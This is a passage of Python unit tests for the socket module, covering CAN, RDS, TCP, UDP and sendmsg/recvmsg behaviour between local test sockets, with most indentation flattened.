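def _example_flowinfo_in_range(flowinfo):
    """Return True if flowinfo fits the 20-bit IPv6 flow label field."""
    return 0 <= flowinfo <= 0xfffff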
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.bind(('', ))
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(socket.error, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
@unittest.skipUnless(thread, 'Threading required for this test.')
class CANTest(ThreadedCANSocketTest):
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
self.assertEqual(addr[1], socket.AF_CAN)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
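# A minimal standalone sketch of the "=IB3x8s" layout documented in CANTest
# above: a 4-byte CAN ID, a 1-byte data length code, 3 padding bytes, then 8
# data bytes.  It mirrors build_can_frame()/dissect_can_frame() without
# touching a socket; it is illustrative only and is never called by the test
# runner.
def _example_can_frame_roundtrip():
    fmt = "=IB3x8s"
    payload = b'\x01\x02\x03'
    # Pack: pad the payload to 8 bytes and record its real length in can_dlc.
    frame = struct.pack(fmt, 0x123, len(payload), payload.ljust(8, b'\x00'))
    assert len(frame) == struct.calcsize(fmt) == 16
    # Unpack: slice the 8-byte data field back down to can_dlc bytes.
    can_id, can_dlc, data = struct.unpack(fmt, frame)
    assert (can_id, data[:can_dlc]) == (0x123, payload)
    return can_id, data[:can_dlc]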
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
@unittest.skipUnless(thread, 'Threading required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testCongestion(self):
# wait until the sender is done
self.evt.wait()
def _testCongestion(self):
# test the behavior in case of congestion
self.data = b'fill'
self.cli.setblocking(False)
try:
# try to lower the receiver's socket buffer size
self.cli.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 16384)
except OSError:
pass
with self.assertRaises(OSError) as cm:
try:
# fill the receiver's socket buffer
while True:
self.cli.sendto(self.data, 0, (HOST, self.port))
finally:
# signal the receiver we're done
self.evt.set()
# sendto() should have failed with ENOBUFS
self.assertEqual(cm.exception.errno, errno.ENOBUFS)
        # and we should have received a congestion notification via select()
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
while 1:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(socket.error, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
        # Testing sendto() and recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
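# As a hedged illustration of the composition described above, a concrete
# test class is typically assembled along these lines (ExampleRecvmsgUDPTest
# and ExampleUDPTestBase are hypothetical names, not classes defined in this
# module):
#
#     class ExampleRecvmsgUDPTest(RecvmsgTests,
#                                 SendrecvmsgDgramBase,
#                                 ExampleUDPTestBase):
#         pass
#
# The generic mixins contribute the test methods, while the bases map the
# concrete client/server sockets onto cli_sock/serv_sock and supply the
# addresses and expected msg_flags behaviour.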
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = 3.0
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
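# A hedged worked example of the mask arithmetic in
# SendrecvmsgBase.checkFlags() above, using made-up flag values rather than
# real msg_flags constants.  Illustrative only; never called by the test
# runner.
def _example_checkflags_mask():
    checkset, checkunset, ignore = 0b001, 0b010, 0b100
    mask = (checkset | checkunset) & ~ignore          # == 0b011
    # flags == 0b101 passes: the required 0b001 bit is set, the forbidden
    # 0b010 bit is clear, and the ignored 0b100 bit is not compared at all.
    assert (0b101 & mask) == (checkset & mask)
    # flags == 0b011 fails: the forbidden 0b010 bit is set.
    assert (0b011 & mask) != (checkset & mask)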
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(socket.error) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(socket.error, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
with self.assertRaises(socket.timeout):
while True:
self.sendmsgToServer([b"a"*512])
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
    @skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(socket.error) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(socket.error, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(socket.error, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
# FreeBSD < 8 doesn't always set the MSG_TRUNC flag when a truncated
# datagram is received (issue #13001).
@support.requires_freebsd_version(8)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
@support.requires_freebsd_version(8)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(socket.error, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(socket.timeout,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
